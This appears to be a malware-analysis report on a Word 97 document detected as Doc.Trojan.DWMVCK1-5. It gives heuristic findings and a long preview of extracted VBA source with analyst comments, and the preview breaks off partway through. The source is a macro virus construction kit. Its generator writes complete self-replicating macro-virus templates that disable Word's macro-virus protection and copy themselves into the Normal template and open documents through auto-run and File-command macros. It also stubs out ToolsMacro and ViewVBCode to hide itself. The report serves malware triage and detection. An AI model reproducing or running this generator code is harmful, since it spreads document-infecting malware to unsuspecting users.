MALICIOUS
256
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
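The file contains legacy WordBasic macro virus markers and AutoOpen/Auto_Close macros, indicating it is designed to execute malicious code when the document is opened. The presence of VBA macros and the ClamAV detection further support its malicious nature. The report classifies the script as a loader for a legacy macro virus. The extracted source preview below, however, shows a form-driven generator (its AutoOpen sets the window caption to "DarkChasm's Word 97 Macro Virus Construction Kit") that writes macro-virus source to an output file. The replication and protection-disabling lines matched by the heuristics appear inside `Print #1` string literals, so those matches are on emitted template text rather than on statements this document runs itself.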
Heuristics 6
-
ClamAV: Doc.Trojan.DWMVCK1-5 | critical | CLAMAV_DETECTION
ClamAV detected this file as malware: Doc.Trojan.DWMVCK1-5
-
VBA macros detected | medium | 3 related findings | OLE_VBA_MACROS
Document contains VBA macro code
-
VBA macro-virus self-replication / AV tampering | critical | OLE_VBA_MACRO_VIRUS_REPLICATION
VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
Matched line in script:
Print #1, " Options.VirusProtection = False"
(In this sample the matched text is a string literal passed to `Print #1`, i.e. text written to the generated source file.)
-
AutoOpen macro | low | OLE_VBA_AUTOOPEN
AutoOpen macro
Matched line in script:
Sub AutoOpen()
-
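Auto_Close macro | low | OLE_VBA_AUTOCLOSE
Auto_Close macro
Matched line in script:
Print #1, "'AutoClose macro"
(The matched text is a comment string emitted by `Print #1`; the extracted preview does not show an AutoClose Sub defined in this document itself.)
-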
Legacy WordBasic macro-virus markers | high | OLE_LEGACY_WORDBASIC_MACRO_VIRUS
OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 41478 bytes |

SHA-256: e73ef0cb653cc6f8d08561f39e63bced5062412be64dc4326659bc7e839d4f88

Detection
ClamAV: Doc.Trojan.DWMVCK1-5
Obfuscation or payload: unlikely
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "DW97MVCK"
Public VirusName As String
Public SourceFileName As String
Public NumberOfMacros As String
' Analyst note: AutoOpen is the document's auto-execution entry point.
' In this sample it does not replicate anything itself: it retitles the
' Word window and shows the kit's first form (frmStartForm).
' The caption string below is a stable static indicator for triage and
' signature work.
Sub AutoOpen()
' Any runtime error in this Sub is silently ignored.
On Error Resume Next
Application.Caption = "DarkChasm's Word 97 Macro Virus Construction Kit"
frmStartForm.Show
End Sub
' Analyst note: every Sub in this run has an empty body. The names match
' Word built-in command names. In Word, a macro named after a built-in
' command runs in place of that command, so while this project is loaded
' these commands presumably do nothing - including ToolsMacro and
' ViewVBCode, the usual routes for inspecting a document's macros
' (verify against the Word version under analysis).
' Empty stubs with these names are a useful static triage indicator.
Sub FileTemplates()
End Sub
Sub ToolsCustomize()
End Sub
Sub FileNew()
End Sub
Sub EditCut()
End Sub
Sub EditCopy()
End Sub
Sub EditPaste()
End Sub
Sub EditPasteSpecial()
End Sub
Sub EditClear()
End Sub
Sub EditSelectAll()
End Sub
Sub EditFind()
End Sub
Sub EditReplace()
End Sub
Sub EditGoTo()
End Sub
Sub ToolsOptions()
End Sub
Sub InsertObject()
End Sub
Sub InsertFile()
End Sub
Sub InsertHyperlink()
End Sub
Sub InsertCaption()
End Sub
Sub InsertFootNote()
End Sub
Sub InsertBreak()
End Sub
Sub TableSort()
End Sub
Sub TableFormula()
End Sub
Sub FilePrint()
End Sub
Sub FilePrintPreview()
End Sub
Sub FileVersions()
End Sub
Sub FileProperties()
End Sub
Sub ToolsWordCount()
End Sub
' Empty override: the Tools > Macro command name is taken by a no-op.
Sub ToolsMacro()
End Sub
' Empty override: the View VB Code command name is taken by a no-op.
Sub ViewVBCode()
End Sub
Attribute VB_Name = "frmStartForm"
Attribute VB_Base = "0{F0B82237-E726-11D0-A507-000000000000}{F0B8220F-E726-11D0-A507-000000000000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Analyst note: OK handler of the start form. Pure UI navigation: hides
' frmStartForm and shows frmVirusSourceName. No file or template access here.
Private Sub cmdOK_Click()
frmStartForm.Hide
frmVirusSourceName.Show
End Sub
Attribute VB_Name = "frmVirusSourceName"
Attribute VB_Base = "0{F0B8223C-E726-11D0-A507-000000000000}{F0B82217-E726-11D0-A507-000000000000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Analyst note: OK handler of frmVirusSourceName. Collects two operator
' inputs and stores them in the module-level Public variables VirusName
' and SourceFileName. SourceFileName is later used by cmdMAKE_Click as
' the path in "Open SourceFileName For Output", so the resulting .txt or
' .bas file is a dropped artifact to look for on an affected host.
' Only emptiness is checked; no other validation of either value is
' visible in this handler.
Private Sub cmdOK_Click()
' Any runtime error jumps to the exit label at the end of the Sub.
On Error GoTo DW97MVCK
' txtboxnotfilled is not declared in the visible code
' (presumably an implicit Variant - confirm against the full module).
If txtVirusName.Text = "" Then
MsgBox "Fill out the Virus Name text box.", vbOKOnly, "DW97MVCK"
txtboxnotfilled = 1
End If
If txtSourceFileName.Text = "" Then
MsgBox "Fill out the Source File Name text box.", vbOKOnly, "DW97MVCK"
txtboxnotfilled = 1
End If
If opttxt.Value = False And optBAS.Value = False Then
MsgBox "Choose if you want the output file to be a txt file or bas file.", vbOKOnly, "DW97MVCK"
txtboxnotfilled = 1
End If
' Any failed check above leaves the form open and exits.
If txtboxnotfilled = 1 Then GoTo DW97MVCK
' The chosen extension is appended to the text box value itself.
If opttxt.Value = True Then
txtSourceFileName = txtSourceFileName & ".txt"
End If
If optBAS.Value = True Then
txtSourceFileName = txtSourceFileName & ".bas"
End If
VirusName = txtVirusName.Text
SourceFileName = txtSourceFileName.Text
frmVirusSourceName.Hide
frmVirusBody.Show
DW97MVCK:
End Sub
Attribute VB_Name = "frmVirusBody"
Attribute VB_Base = "0{F0B82240-E726-11D0-A507-000000000000}{F0B82219-E726-11D0-A507-000000000000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Analyst note: button handler of frmVirusBody. For each ticked feature
' checkbox (stealth, retro, polymorphic, payload) it shows the matching
' option form, then hides this form and shows frmMacros. It only drives
' the UI; the selections are read later from the forms' controls.
Private Sub CommandButton1_Click()
' Any runtime error skips straight to the end of the Sub.
On Error GoTo ByeBye
If chkbStealth.Value = True Then
frmStealth.Show
End If
If chkbRetro.Value = True Then
frmRetro.Show
End If
If chkbPolymorphic.Value = True Then
frmPolymorphic.Show
End If
If chkbPayload.Value = True Then
frmPayload.Show
End If
frmVirusBody.Hide
frmMacros.Show
ByeBye:
End Sub
' Analyst note: form initialiser for frmVirusBody. Copies the Public
' variables VirusName and SourceFileName into two labels for display.
Private Sub UserForm_Initialize()
On Error GoTo ByeBye
lblVirusName = VirusName
lblSourceFileName = SourceFileName
ByeBye:
End Sub
Attribute VB_Name = "frmStealth"
Attribute VB_Base = "0{F0B8224C-E726-11D0-A507-000000000000}{F0B8221B-E726-11D0-A507-000000000000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Analyst note: OK handler of frmStealth. It only hides the form; the
' form's controls (e.g. chkbToolsMacro) are read later by cmdMAKE_Click.
Private Sub cmdOK_Click()
frmStealth.Hide
End Sub
Attribute VB_Name = "frmRetro"
Attribute VB_Base = "0{F0B82250-E726-11D0-A507-000000000000}{F0B8221D-E726-11D0-A507-000000000000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Analyst note: OK handler of frmRetro. It only hides the form. The
' form's checkboxes are named after antivirus products (chkbAVP,
' chkbMcAfee, chkbNorton, ...) and are read later by cmdMAKE_Click to
' decide whether a "Retro" call is emitted into the generated source.
Private Sub cmdOK_Click()
frmRetro.Hide
End Sub
Attribute VB_Name = "frmPolymorphic"
Attribute VB_Base = "0{F0B82254-E726-11D0-A507-000000000000}{F0B8221F-E726-11D0-A507-000000000000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Analyst note: OK handler of frmPolymorphic. It only hides the form.
' The form's optAPMRS control is read later by cmdMAKE_Click to decide
' whether a "Mutate" call is emitted into the generated source.
Private Sub cmdOK_Click()
frmPolymorphic.Hide
End Sub
Attribute VB_Name = "frmPayload"
Attribute VB_Base = "0{F0B82244-E726-11D0-A507-000000000000}{F0B82221-E726-11D0-A507-000000000000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Analyst note: OK handler of frmPayload. Shows one option form per
' ticked payload checkbox (message box, password, beep, exit Windows,
' Office Assistant, caption, status bar), then hides this form.
' The same checkboxes are tested later by cmdMAKE_Click to decide
' whether a "Payload" call is emitted into the generated source.
Private Sub cmdOK_Click()
' Any runtime error skips straight to the end of the Sub.
On Error GoTo ByeBye
If chkbMessageBox.Value = True Then
frmPayloadMessageBox.Show
End If
If chkbPassword.Value = True Then
frmPayloadSetPassword.Show
End If
If chkbBeep.Value = True Then
frmPayloadBeep.Show
End If
If chkbExitWindows.Value = True Then
frmPayloadExitWindows.Show
End If
If chkbAssistant.Value = True Then
frmPayloadOfficeAssistant.Show
End If
If chkbCaption.Value = True Then
frmPayloadChangeCaption.Show
End If
If chkbChangeStatusBar.Value = True Then
frmPayloadChangeStatusBar.Show
End If
frmPayload.Hide
ByeBye:
End Sub
Attribute VB_Name = "frmPayloadMessageBox"
Attribute VB_Base = "0{F0B82258-E726-11D0-A507-000000000000}{F0B82223-E726-11D0-A507-000000000000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Analyst note: OK handler of frmPayloadMessageBox. The form is hidden
' only when both the title and the message text boxes are non-empty;
' otherwise the handler exits and the form stays open.
Private Sub cmdOK_Click()
If txtMessageBoxTitle = "" Then GoTo ByeBye
If txtMessageBox = "" Then GoTo ByeBye
frmPayloadMessageBox.Hide
ByeBye:
End Sub
Attribute VB_Name = "frmPayloadSetPassword"
Attribute VB_Base = "0{F0B8225C-E726-11D0-A507-000000000000}{F0B82225-E726-11D0-A507-000000000000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Analyst note: OK handler of frmPayloadSetPassword. The form is hidden
' only when txtPassword is non-empty. How the value is used is not
' visible in this handler.
Private Sub cmdOK_Click()
If txtPassword = "" Then GoTo ByeBye
frmPayloadSetPassword.Hide
ByeBye:
End Sub
Attribute VB_Name = "frmPayloadBeep"
Attribute VB_Base = "0{F0B82260-E726-11D0-A507-000000000000}{F0B82227-E726-11D0-A507-000000000000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Analyst note: OK handler of frmPayloadBeep. Normalises the trigger-date
' fields: an empty year, day or month is replaced by the literal text
' "Now()", the year is clamped to 1997..3000, and a day outside 1..31 or
' a month outside 1..12 exits without hiding the form.
' NOTE(review): the comparisons mix text box values with numbers and rely
' on implicit conversion; any resulting runtime error is suppressed by
' On Error Resume Next, so the exact path taken for "Now()" values should
' be confirmed dynamically rather than assumed.
Private Sub cmdOK_Click()
On Error Resume Next
If txtYear = "" Then
txtYear = "Now()"
End If
If txtYear < 1997 Then
txtYear = "1997"
End If
If txtYear > 3000 Then
txtYear = "3000"
End If
If txtDay = "" Then
txtDay = "Now()"
End If
If txtDay > 31 Then GoTo DW97MVCK
If txtDay < 1 Then GoTo DW97MVCK
If txtMonth = "" Then
txtMonth = "Now()"
End If
If txtMonth > 12 Then GoTo DW97MVCK
If txtMonth < 1 Then GoTo DW97MVCK
frmPayloadBeep.Hide
DW97MVCK:
End Sub
' Analyst note: spin-down handler on frmPayloadBeep. Decrements the beep
' count shown in txtNumberOfBeeps, leaving it unchanged when it is 1.
Private Sub SpinButton1_SpinDown()
If txtNumberOfBeeps = 1 Then GoTo DW97MVCK
txtNumberOfBeeps = txtNumberOfBeeps - 1
DW97MVCK:
End Sub
' Analyst note: spin-up handler on frmPayloadBeep. Increments the beep
' count shown in txtNumberOfBeeps; no upper bound is enforced here.
Private Sub SpinButton1_SpinUp()
txtNumberOfBeeps = txtNumberOfBeeps + 1
End Sub
Attribute VB_Name = "frmPayloadExitWindows"
Attribute VB_Base = "0{F0B82264-E726-11D0-A507-000000000000}{F0B82229-E726-11D0-A507-000000000000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Analyst note: OK handler of frmPayloadExitWindows. It only hides the form.
Private Sub cmdOK_Click()
frmPayloadExitWindows.Hide
End Sub
Attribute VB_Name = "frmPayloadOfficeAssistant"
Attribute VB_Base = "0{F0B82268-E726-11D0-A507-000000000000}{F0B8222B-E726-11D0-A507-000000000000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Analyst note: OK handler of frmPayloadOfficeAssistant. The form is
' hidden only when both txtHeading and txtMessage are non-empty.
Private Sub cmdOK_Click()
If txtHeading = "" Then GoTo ByeBye
If txtMessage = "" Then GoTo ByeBye
frmPayloadOfficeAssistant.Hide
ByeBye:
End Sub
Attribute VB_Name = "frmPayloadChangeStatusBar"
Attribute VB_Base = "0{F0B8226C-E726-11D0-A507-000000000000}{F0B82233-E726-11D0-A507-000000000000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Analyst note: OK handler of frmPayloadChangeStatusBar. The form is
' hidden only when txtStatusBar is non-empty.
Private Sub cmdOK_Click()
If txtStatusBar = "" Then GoTo ByeBye
frmPayloadChangeStatusBar.Hide
ByeBye:
End Sub
Attribute VB_Name = "frmPayloadChangeCaption"
Attribute VB_Base = "0{F0B82270-E726-11D0-A507-000000000000}{F0B8222D-E726-11D0-A507-000000000000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Analyst note: OK handler of frmPayloadChangeCaption. The form is
' hidden only when txtCaption is non-empty.
Private Sub cmdOK_Click()
If txtCaption = "" Then GoTo ByeBye
frmPayloadChangeCaption.Hide
ByeBye:
End Sub
Attribute VB_Name = "frmMacros"
Attribute VB_Base = "0{F0B82274-E726-11D0-A507-000000000000}{F0B8222F-E726-11D0-A507-000000000000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Analyst note: OK handler of frmMacros. Counts how many trigger macros
' the operator ticked (AutoOpen, AutoClose, FileSaveAs, FileSave,
' FilePrint, ToolsWordCount, EditFind) and refuses to continue when none
' is selected. These names are the auto-run and command-override macro
' names that the generated source will define, so they are the names to
' look for when triaging documents produced from this kit.
' NumberOfMacros is declared "Public ... As String" at module level, so
' the counting below relies on implicit string/number conversion.
Private Sub cmdOK_Click()
' Any runtime error skips straight to the end of the Sub.
On Error GoTo ByeBye
NumberOfMacros = 0
If chkbAutoOpen.Value = True Then
NumberOfMacros = NumberOfMacros + 1
End If
If chkbAutoClose.Value = True Then
NumberOfMacros = NumberOfMacros + 1
End If
If chkbFileSaveAs.Value = True Then
NumberOfMacros = NumberOfMacros + 1
End If
If chkbFileSave.Value = True Then
NumberOfMacros = NumberOfMacros + 1
End If
If chkbFilePrint.Value = True Then
NumberOfMacros = NumberOfMacros + 1
End If
If chkbToolsWordCount.Value = True Then
NumberOfMacros = NumberOfMacros + 1
End If
If chkbEditFind.Value = True Then
NumberOfMacros = NumberOfMacros + 1
End If
' Nothing ticked: show the prompt at label DW97MVCK and keep the form open.
If chkbAutoOpen.Value = False And chkbAutoClose.Value = False And chkbFileSaveAs.Value = False And chkbFileSave.Value = False And chkbFilePrint.Value = False And chkbEditFind.Value = False And chkbToolsWordCount.Value = False Then
GoTo DW97MVCK
End If
frmMacros.Hide
frmMakeVirus.Show
GoTo ByeBye
DW97MVCK:
MsgBox "Pick a macro to use as the infection vector.", vbOKOnly, "DW97MVCK"
ByeBye:
End Sub
Attribute VB_Name = "frmMakeVirus"
Attribute VB_Base = "0{F0B82248-E726-11D0-A507-000000000000}{F0B82231-E726-11D0-A507-000000000000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Analyst note: Exit button of frmMakeVirus. It calls Tasks.ExitWindows
' rather than just closing the form. When detonating this sample, expect
' the button to end the Windows session of the analysis VM (presumably
' closing all applications - confirm on the Word build in use).
Private Sub cmdExit_Click()
' Any runtime error is silently ignored.
On Error Resume Next
Tasks.ExitWindows
End Sub
Private Sub cmdMAKE_Click()
On Error GoTo ByeBye
Open SourceFileName For Output As #1
Print #1,
Print #1, "'Generated by DarkChasm's Word 97 Macro Virus Construction Kit (DW97MVCK)"
Print #1, "'Virus Name: " & VirusName
Print #1,
If frmMacros.chkbAutoOpen = True Then
Print #1,
Print #1, "'------------------------------------------------------------"
Print #1, "'AutoOpen macro"
Print #1, "'Executed when a document is opened"
Print #1, "'------------------------------------------------------------"
Print #1, "Sub AutoOpen()"
Print #1, " On Error GoTo " & VirusName
Print #1,
If frmPayload.chkbAssistant = True Or frmPayload.chkbBeep = True Or frmPayload.chkbCaption = True Or frmPayload.chkbChangeStatusBar = True Or frmPayload.chkbExitWindows = True Or frmPayload.chkbMessageBox = True Or frmPayload.chkbPassword = True Then
Print #1, " Payload"
Print #1,
End If
If frmPolymorphic.optAPMRS = True Then
Print #1, " Mutate"
Print #1,
End If
Print #1, " Application.ScreenUpdating = False"
Print #1, " Application.DisplayAlerts = wdAlertsNone"
Print #1,
Print #1, " WordBasic.DisableAutoMacros 0"
Print #1, " Options.VirusProtection = False"
Print #1,
Print #1, " Set GlobalDoc = NormalTemplate"
Print #1, " Set ActiveDoc = ActiveDocument"
Print #1,
Print #1, " GlobalInstalled = No"
Print #1, " DocumentInstalled = No"
Print #1,
Print #1, " For j = 1 To NormalTemplate.VBProject.VBComponents.Count"
Print #1, " If NormalTemplate.VBProject.VBComponents(j).Name = """ & VirusName & """ Then"
Print #1, " GlobalInstalled = Yes"
Print #1, " End If"
Print #1, " Next"
Print #1,
Print #1, " For i = 1 To ActiveDocument.VBProject.VBComponents.Count"
Print #1, " If ActiveDocument.VBProject.VBComponents(i).Name = """ & VirusName & """ Then"
Print #1, " DocumentInstalled = Yes"
Print #1, " End If"
Print #1, " Next"
Print #1,
Print #1, " If GlobalInstalled = No Then"
Print #1, " Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:=""" & VirusName & """, Object:=wdOrganizerObjectProjectItems"
Print #1, " Options.SaveNormalPrompt = False"
Print #1, " End If"
Print #1,
Print #1, " If DocumentInstalled = No Then"
Print #1, " Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:=""" & VirusName & """, Object:=wdOrganizerObjectProjectItems"
Print #1, " ActiveDoc.SaveAs FileName:=ActiveDoc.Name, FileFormat:=wdFormatTemplate"
Print #1, " End If"
Print #1,
Print #1, " Application.DisplayAlerts = wdAlertsAll"
Print #1,
If frmRetro.chkbAVP Or frmRetro.chkbFMacro Or frmRetro.chkbFProt95 Or frmRetro.chkbMcAfee Or frmRetro.chkbNorton Or frmRetro.chkbPCCillan95 Or frmRetro.chkbPCCillan97 Or frmRetro.chkbTBAV = True Then
Print #1, " Retro"
Print #1,
End If
Print #1, VirusName & ":"
Print #1, "End Sub"
Print #1,
End If
If frmMacros.chkbAutoClose = True Then
Print #1,
Print #1, "'------------------------------------------------------------"
Print #1, "'AutoClose macro"
Print #1, "'Executed when a document is closed"
Print #1, "'------------------------------------------------------------"
Print #1, "Sub AutoClose()"
Print #1, " On Error GoTo " & VirusName
Print #1,
If frmPayload.chkbAssistant = True Or frmPayload.chkbBeep = True Or frmPayload.chkbCaption = True Or frmPayload.chkbChangeStatusBar = True Or frmPayload.chkbExitWindows = True Or frmPayload.chkbMessageBox = True Or frmPayload.chkbPassword = True Then
Print #1, " Payload"
Print #1,
End If
If frmPolymorphic.optAPMRS = True Then
Print #1, " Mutate"
Print #1,
End If
Print #1, " Application.ScreenUpdating = False"
Print #1, " Application.DisplayAlerts = wdAlertsNone"
Print #1,
Print #1, " WordBasic.DisableAutoMacros 0"
Print #1, " Options.VirusProtection = False"
Print #1,
Print #1, " Set GlobalDoc = NormalTemplate"
Print #1, " Set ActiveDoc = ActiveDocument"
Print #1,
Print #1, " GlobalInstalled = No"
Print #1, " DocumentInstalled = No"
Print #1,
Print #1, " For j = 1 To NormalTemplate.VBProject.VBComponents.Count"
Print #1, " If NormalTemplate.VBProject.VBComponents(j).Name = """ & VirusName & """ Then"
Print #1, " GlobalInstalled = Yes"
Print #1, " End If"
Print #1, " Next"
Print #1,
Print #1, " For i = 1 To ActiveDocument.VBProject.VBComponents.Count"
Print #1, " If ActiveDocument.VBProject.VBComponents(i).Name = """ & VirusName & """ Then"
Print #1, " DocumentInstalled = Yes"
Print #1, " End If"
Print #1, " Next"
Print #1,
Print #1, " If GlobalInstalled = No Then"
Print #1, " Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:=""" & VirusName & """, Object:=wdOrganizerObjectProjectItems"
Print #1, " Options.SaveNormalPrompt = False"
Print #1, " End If"
Print #1,
Print #1, " If DocumentInstalled = No Then"
Print #1, " Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:=""" & VirusName & """, Object:=wdOrganizerObjectProjectItems"
Print #1, " ActiveDoc.SaveAs FileName:=ActiveDoc.Name, FileFormat:=wdFormatTemplate"
Print #1, " End If"
Print #1,
Print #1, " Application.DisplayAlerts = wdAlertsAll"
Print #1,
If frmRetro.chkbAVP Or frmRetro.chkbFMacro Or frmRetro.chkbFProt95 Or frmRetro.chkbMcAfee Or frmRetro.chkbNorton Or frmRetro.chkbPCCillan95 Or frmRetro.chkbPCCillan97 Or frmRetro.chkbTBAV = True Then
Print #1, " Retro"
Print #1,
End If
Print #1, VirusName & ":"
Print #1, "End Sub"
Print #1,
End If
If frmMacros.chkbFileSaveAs = True Then
Print #1,
Print #1, "'------------------------------------------------------------"
Print #1, "'FileSaveAs macro"
Print #1, "'Executed when a user selects File SaveAs from the Word menu"
Print #1, "'------------------------------------------------------------"
Print #1, "Sub FileSaveAs()"
Print #1,
Print #1, " Dialogs(wdDialogFileSaveAs).Show"
Print #1,
Print #1, " On Error GoTo " & VirusName
Print #1,
If frmPayload.chkbAssistant = True Or frmPayload.chkbBeep = True Or frmPayload.chkbCaption = True Or frmPayload.chkbChangeStatusBar = True Or frmPayload.chkbExitWindows = True Or frmPayload.chkbMessageBox = True Or frmPayload.chkbPassword = True Then
Print #1, " Payload"
Print #1,
End If
If frmPolymorphic.optAPMRS = True Then
Print #1, " Mutate"
Print #1,
End If
Print #1, " Application.ScreenUpdating = False"
Print #1, " Application.DisplayAlerts = wdAlertsNone"
Print #1,
Print #1, " WordBasic.DisableAutoMacros 0"
Print #1, " Options.VirusProtection = False"
Print #1,
Print #1, " Set GlobalDoc = NormalTemplate"
Print #1, " Set ActiveDoc = ActiveDocument"
Print #1,
Print #1, " GlobalInstalled = No"
Print #1, " DocumentInstalled = No"
Print #1,
Print #1, " For j = 1 To NormalTemplate.VBProject.VBComponents.Count"
Print #1, " If NormalTemplate.VBProject.VBComponents(j).Name = """ & VirusName & """ Then"
Print #1, " GlobalInstalled = Yes"
Print #1, " End If"
Print #1, " Next"
Print #1,
Print #1, " For i = 1 To ActiveDocument.VBProject.VBComponents.Count"
Print #1, " If ActiveDocument.VBProject.VBComponents(i).Name = """ & VirusName & """ Then"
Print #1, " DocumentInstalled = Yes"
Print #1, " End If"
Print #1, " Next"
Print #1,
Print #1, " If GlobalInstalled = No Then"
Print #1, " Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:=""" & VirusName & """, Object:=wdOrganizerObjectProjectItems"
Print #1, " Options.SaveNormalPrompt = False"
Print #1, " End If"
Print #1,
Print #1, " If DocumentInstalled = No Then"
Print #1, " Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:=""" & VirusName & """, Object:=wdOrganizerObjectProjectItems"
Print #1, " ActiveDoc.SaveAs FileName:=ActiveDoc.Name, FileFormat:=wdFormatTemplate"
Print #1, " End If"
Print #1,
Print #1, " Application.DisplayAlerts = wdAlertsAll"
Print #1,
If frmRetro.chkbAVP Or frmRetro.chkbFMacro Or frmRetro.chkbFProt95 Or frmRetro.chkbMcAfee Or frmRetro.chkbNorton Or frmRetro.chkbPCCillan95 Or frmRetro.chkbPCCillan97 Or frmRetro.chkbTBAV = True Then
Print #1, " Retro"
Print #1,
End If
Print #1, VirusName & ":"
Print #1, "End Sub"
Print #1,
End If
If frmMacros.chkbFileSave = True Then
Print #1,
Print #1, "'------------------------------------------------------------"
Print #1, "'FileSave macro"
Print #1, "'Executed when a user selects File Save from the Word menu"
Print #1, "'------------------------------------------------------------"
Print #1, "Sub FileSave()"
Print #1,
Print #1, " ActiveDocument.Save"
Print #1,
Print #1, " On Error GoTo " & VirusName
Print #1,
If frmPayload.chkbAssistant = True Or frmPayload.chkbBeep = True Or frmPayload.chkbCaption = True Or frmPayload.chkbChangeStatusBar = True Or frmPayload.chkbExitWindows = True Or frmPayload.chkbMessageBox = True Or frmPayload.chkbPassword = True Then
Print #1, " Payload"
Print #1,
End If
If frmPolymorphic.optAPMRS = True Then
Print #1, " Mutate"
Print #1,
End If
Print #1, " Application.ScreenUpdating = False"
Print #1, " Application.DisplayAlerts = wdAlertsNone"
Print #1,
Print #1, " WordBasic.DisableAutoMacros 0"
Print #1, " Options.VirusProtection = False"
Print #1,
Print #1, " Set GlobalDoc = NormalTemplate"
Print #1, " Set ActiveDoc = ActiveDocument"
Print #1,
Print #1, " GlobalInstalled = No"
Print #1, " DocumentInstalled = No"
Print #1,
Print #1, " For j = 1 To NormalTemplate.VBProject.VBComponents.Count"
Print #1, " If NormalTemplate.VBProject.VBComponents(j).Name = """ & VirusName & """ Then"
Print #1, " GlobalInstalled = Yes"
Print #1, " End If"
Print #1, " Next"
Print #1,
Print #1, " For i = 1 To ActiveDocument.VBProject.VBComponents.Count"
Print #1, " If ActiveDocument.VBProject.VBComponents(i).Name = """ & VirusName & """ Then"
Print #1, " DocumentInstalled = Yes"
Print #1, " End If"
Print #1, " Next"
Print #1,
Print #1, " If GlobalInstalled = No Then"
Print #1, " Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:=""" & VirusName & """, Object:=wdOrganizerObjectProjectItems"
Print #1, " Options.SaveNormalPrompt = False"
Print #1, " End If"
Print #1,
Print #1, " If DocumentInstalled = No Then"
Print #1, " Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:=""" & VirusName & """, Object:=wdOrganizerObjectProjectItems"
Print #1, " ActiveDoc.SaveAs FileName:=ActiveDoc.Name, FileFormat:=wdFormatTemplate"
Print #1, " End If"
Print #1,
Print #1, " Application.DisplayAlerts = wdAlertsAll"
Print #1,
If frmRetro.chkbAVP Or frmRetro.chkbFMacro Or frmRetro.chkbFProt95 Or frmRetro.chkbMcAfee Or frmRetro.chkbNorton Or frmRetro.chkbPCCillan95 Or frmRetro.chkbPCCillan97 Or frmRetro.chkbTBAV = True Then
Print #1, " Retro"
Print #1,
End If
Print #1, VirusName & ":"
Print #1, "End Sub"
Print #1,
End If
If frmMacros.chkbFilePrint = True Then
Print #1,
Print #1, "'------------------------------------------------------------"
Print #1, "'FilePrint macro"
Print #1, "'Executed when a user selects File Print from the Word menu"
Print #1, "'------------------------------------------------------------"
Print #1, "Sub FilePrint()"
Print #1,
Print #1, " Dialogs(wdDialogFilePrint).Show"
Print #1,
Print #1, " On Error GoTo " & VirusName
Print #1,
If frmPayload.chkbAssistant = True Or frmPayload.chkbBeep = True Or frmPayload.chkbCaption = True Or frmPayload.chkbChangeStatusBar = True Or frmPayload.chkbExitWindows = True Or frmPayload.chkbMessageBox = True Or frmPayload.chkbPassword = True Then
Print #1, " Payload"
Print #1,
